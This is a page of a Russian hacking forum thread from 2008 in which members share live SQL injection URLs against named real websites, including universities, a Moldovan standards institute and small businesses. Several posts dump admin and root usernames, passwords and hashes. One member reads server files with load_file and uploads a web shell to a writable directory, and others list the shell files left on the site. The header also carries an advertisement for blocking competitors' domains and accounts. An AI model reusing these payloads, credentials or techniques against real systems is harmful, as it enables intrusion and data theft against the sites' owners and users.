Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 678 из 1242

678

Опции темы

Поиск в этой теме

Опции просмотра

#6771

01.11.2008, 09:12

Iceangel_

Members of Antichat - Level 5

Регистрация: 09.07.2006

Сообщений: 553

Провел на форуме:
7561206

Репутация: 1861

продолжаем .edu инъекции...

х.з что...

Код:

http://webscript.princeton.edu/~paw/memorials/memdisplay.php?id=-1047+union+select+1,2,3,4,version(),6,7,8,9/*

4.1.12-log
PR=0
----------------------------------------------------------------

Institute for NanoBioTechnology

Код:

http://inbt.jhu.edu/facultyexpertise.php?id=personalresult&usr=-45+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*

4.1.22-standard
PR=5
----------------------------------------------------------------

Portland State University

Код:

http://web.pdx.edu/~salp/salp_saga/calendar.php?action=view&id=-1143+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13--

5.0.37
PR=4
----------------------------------------------------------------

х.з что, да еще и со слепой инъекцией...

Код:

http://cils.exploratorium.edu/cils/page.php?ID=148+union+select+1,2,3,4--

PR=6

#6772

02.11.2008, 04:52

Ponchik

Постоянный

Регистрация: 30.08.2005

Сообщений: 730

Провел на форуме:
6828219

Репутация: 2274

standard.md
ппц, национальный институт стандартизации и всей фигни и с дырками, куда катится молднет =\
Вобще вывод непонятно какой
http://www.standard.md/pageview.php?l=ru&idc=-1+UNION+SELECT+VERSION()/*
Непонятно какая версия... Но
http://www.standard.md/pageview.php?l=ru&idc=-1+UNION+SELECT+VERSION()+FROM+information_schema.t ables/*
Работает, значит 5, а кому надо разберётся и с выводом

#6773

02.11.2008, 23:54

-=megahertz=-

Участник форума

Регистрация: 23.05.2007

Сообщений: 103

Провел на форуме:
380957

Репутация: 56

Отправить сообщение для -=megahertz=- с помощью ICQ

пончик ты даже кол-во полей не подобрал... еще и говоришь что вывод непонятно какой

#6774

03.11.2008, 00:26

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+version()/*
как бэ вывод в заголовке
Пончик, ты забыл там кавычку поставить

http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+concat(username,':',password)+from +users/*

http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+load_file('/etc/passwd')+from+users/*
Так как там фряха, можно средствами load_file читать дериктории, находим httpd.conf
http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+load_file('/usr/local/etc/apache2/httpd.conf')+from+users/*
Смотри сорц, находим строку
DocumentRoot "/usr/home/insm/www"
читаем эту диру
http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+load_file('/usr/home/insm/www')+from+users/*
Щас копаю, воде в веб нельзя залить файл
PS нашёл, папка public доступна на запись))
Вобще ссылку на шелл кидать не буду, те кто умеют зальют =)

Safe mode: OFF
Disable functions: 0
OS: FreeBSD gw.standard.md 5.2.1-RELEASE-p11 FreeBSD 5.2.1-RELEASE-p11 #0: Fri Oct 15 09:17:15 EEST 2004 sv@gw.standard.md:/usr/obj/usr/src/sys/standard.v0 i386

PPS если чё, то там allow_url_fopen = On и в штацессе закрыт доступ к php файлам, решается заливкой phtml

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

Последний раз редактировалось Spyder; 03.11.2008 в 01:24..

#6775

03.11.2008, 02:05

Cennarios

Участник форума

Регистрация: 13.07.2008

Сообщений: 101

Провел на форуме:
346497

Репутация: 303

Отправить сообщение для Cennarios с помощью ICQ

http://www.sticma.com.br/cursos_ver.php?id=-1+union+select+1,2,concat_ws(0x3a3a,nome,Senha,ema il),4,5,6,7,8,9,10,11+from+usuario+limit+0,1
login:admin
pass:sind2008

Админка:http://www.sticma.com.br/admin

Microsoft-IIS/6.0. PHP/5.2.5
Windows NT WINDOWS 5.2 build 3790
NOT SECURE

Достаточно грамотно выставлены права. Выше корня конкретного хоста не лезет.

Есть возможность залить шелл.
---------------------------------------------------------------

P.S. Студия создавша сей ресурс сама страдает sql-inj.
http://www.fonteweb.com.br/solucoes.php?id=-1+union+select+1,concat_ws(0x3a3a,nome,Senha,email ),3,4,5,6,7+from+usuario+limit+0,1
Хеш не подбрутился. Да и дальше копать не стал.
Но походу у них все проекты плешивые...

#6776

03.11.2008, 04:39

Fuckel

Участник форума

Регистрация: 17.01.2008

Сообщений: 170

Провел на форуме:
1608606

Репутация: 105

Отправить сообщение для Fuckel с помощью ICQ

Цитата:

Сообщение от Spyder

спасибо, поржал
http://www.standard.md/fusion_cr/filemanager/index.php
по большому счету заливка скрипта осуществима

))
пс за собой прибераемся
http://www.standard.md/public/2.txt
http://www.standard.md/public/spyder.php
http://www.standard.md/public/spyder.phtml

Последний раз редактировалось Fuckel; 03.11.2008 в 04:45..

#6777

03.11.2008, 05:56

Twoster

Reservists Of Antichat - Level 6

Регистрация: 20.08.2008

Сообщений: 328

Провел на форуме:
7144817

Репутация: 1503

::::::::::::::::::::Америка:::::::::::::::: ::::::::::

Цитата:

http://www.warwick.k12.pa.us/news.php?id=-1+union+select+1,2,3,password,5,user,7,8,9+from+my sql.user/*

root ; 32b4889c7569b9c5

Цитата:

http://www.youth.md/index.php?id=-1+union+select+concat_ws(0x3a,user,password)+from+ mysql.user+limit+0,1--

root ; 2e772d7646f9c841

Цитата:

http://www.rtg.us/news.php?mode=detail&id=-1+union+select+1,username,password,4,5,6,7,8+from+ admins/*
http://www.rtg.us/admin/

admin ; puhhema

::::::::::::::::::::Молдавия:::::::::::::: ::::::::::::

Цитата:

http://oficinadeempleos.us/index.php?page_id=-1&news_id=-1+union+select+1,2,3,4,5,6--

Цитата:

http://www.ong.md/index.php?mod=home&hmod=static&id=-1+union+select+1,2,3/*

Цитата:

http://www.rabota.md/vacancies/vacancyCategory.php?id=-1+union+select+table_name+from+information_schema. TABLES+limit+21,1--
http://www.rabota.md/vacancies/vacancyCategory.php?id=-1+union+select+password+from+tbl_admin--

Поле password присутствует, однако почему то не выводится...

Цитата:

http://businessclass.lunatic.md/index.php?mod=poll&id=-1+union+select+1,2,3--

::::::::::::::::::::name::::::::::::::::::::::::::

Цитата:

http://vegasfastener.name/news.php?id=-1+union+select+1,concat_ws(char(58),version(),data base(),user()),3,4,5,6,7--

::::::::::::::::::::ru::::::::::::::::::::::::::

Цитата:

http://www.mybells.ru/read.php?id=-1+union+select+1,concat_ws(char(58),version(),data base(),user()),3,4,5,6,7,8--

Цитата:

http://mkl.aeroschool.ru/read.php?id=-1+union+select+table_name+from+information_schema. TABLES+limit+49,1--

Цитата:

http://www.eng.technet.ru/print.php?id=-1+union+select+1,2,3,concat_ws(char(58),user,passw ord),5,6,7,8,9,10+from+mysql.user+limit+0,1--&type=a

Цитата:

http://www.2kaudit.ru/print.php?t=projects&id=-1+union+select+1,2,3,login,5,passwd,7,8,9,10,11+fr om+users+limit+0,1--

http://www.2kaudit.ru/login.php
Вход вроде бы тут, однако ни один пароль не подошел!

Цитата:

http://www.masterstone.ru/print.php?p=rek&id=-1+union+select+1,2,version(),4,5,6--

Цитата:

http://art.specialradio.ru/print.php?id=-1+union+select+1,2,3,4,5,6,7,8,9--

Цитата:

http://www.2kaudit.ru/print.php?t=mark&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11--

Цитата:

http://www.listok-veterana.ru/print.php?ID=-1+union+select+1,login,3,4,5,6,7,8,pass,10,11,12,1 3,14,15,16,17,18,19+from+users--

Цитата:

http://www.maxpremium.ru/print.php?id=-1+union+select+1,2,3,4,5,6,7,8--

#6778

03.11.2008, 13:32

xPriZrAkx

Познающий

Регистрация: 16.03.2007

Сообщений: 48

Провел на форуме:
293334

Репутация: 39

Цитата:

http://www.gamer365.hu/profile.php?user_id=128+and+1=0+union+select+1,ver sion(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,42, 53,54,55/*

5.0.32-Debian_7etch6-log

Цитата:

http://www.gamer365.hu/profile.php?user_id=128+and+1=0+union+select+1,cou nt(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,5 0,51,42,53,54,55+from+information_schema.tables/*

847 Таблицы

Цитата:

http://www.gamer365.hu/profile.php?user_id=128+and+1=0+union+select+1,con cat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7,48,49,50,51,42,53,54,55+from+mysql.user--

root:*99619676BCC438CF465A8CADAB3A1305E6A44AB9

-------------------------------------------------------------------------------------------------------------------------------------------

Цитата:

http://chspr.queensu.ca/bio.php?User_ID=26+and+1=0+union+select+1,2,versio n(),4,5,6,7,8,9,10,11,12,13,14,15,16--

5.0.51b 4

Цитата:

http://chspr.queensu.ca/bio.php?User_ID=26+and+1=0+union+select+1,2,count( table_name),4,5,6,7,8,9,10,11,12,13,14,15,16+from+ information_schema.tables--

57 Таблиц

-------------------------------------------------------------------------------------------------------------------------------------------

Цитата:

http://www.travellingbirder.com/tripreports/view_birding_tripreport.php?id=157+union+select+1, 2,3,4,5,6,7,8--

5.0.27-standard

-------------------------------------------------------------------------------------------------------------------------------------------

Цитата:

http://www.lcoastpress.com/books_series.php?id=13+union+select+1,2,version()--

4.1.22

-------------------------------------------------------------------------------------------------------------------------------------------

Цитата:

http://www.visitrandolphcounty.com/attractions.php?id=4+union+select+1,2,version(),4, 5,6,7,8,9,10,11,12,13,14,15,16,17--

4.1.20

-------------------------------------------------------------------------------------------------------------------------------------------

Цитата:

http://www.pakistanintelligence.com/articles.php?id=14+union+select+1,2,3,version(),5, 6,7,8--

4.1.20-max-log

-------------------------------------------------------------------------------------------------------------------------------------------

Цитата:

http://www.jones.com/careers/jonesCareer.php?ID=5+union+select+1,2,3,version(), 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

4.0.17

Последний раз редактировалось xPriZrAkx; 03.11.2008 в 17:34..

#6779

03.11.2008, 17:17

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

Fuckel, над чем ты поржал? над тем что ты можешь залить шелл только через файл менеджер?))) Давай вместе над этим поржём)

пс за собой прибераемся

С хуя ли я должен свой шелл удалять?

Пиздец хакеров развелось, найдут файл менеджер и уже выйбываются

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#6780

03.11.2008, 17:43

xPriZrAkx

Познающий

Регистрация: 16.03.2007

Сообщений: 48

Провел на форуме:
293334

Репутация: 39

Цитата:

http://stocknetwork.co.uk/comments.php?id=23+and+1=0+union+select+1,2,3,4,5, 6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21 ,22,23,24/*

5.0.21-Debian_3ubuntu1-log

Цитата:

http://www.musicworksunlimited.com/news.php?news_id=12+and+1=0+union+select+1,2,3,ver sion()/*

4.1.20

Цитата:

http://www.director-online.com/buildArticle.php?id=-1118+and+1=0+union+select+1,2,3,4,5,version(),7,8/*

4.1.22-standard-log

Цитата:

http://www.pangeaday.org/filmDetail.php?id=14+union+select+1,2,3,4,5,6,vers ion(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3
--

5.0.45-log

Цитата:

https://thewinemakershop.com/recipes.php?cat_id=1&item_id=5+and+1=0+union+selec t+1,2,version(),4,5,6--

5.0.67-log
winemakershop@72.167.131.151
winemakershop

Последний раз редактировалось xPriZrAkx; 03.11.2008 в 18:42..

Страница 678 из 1242

678

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход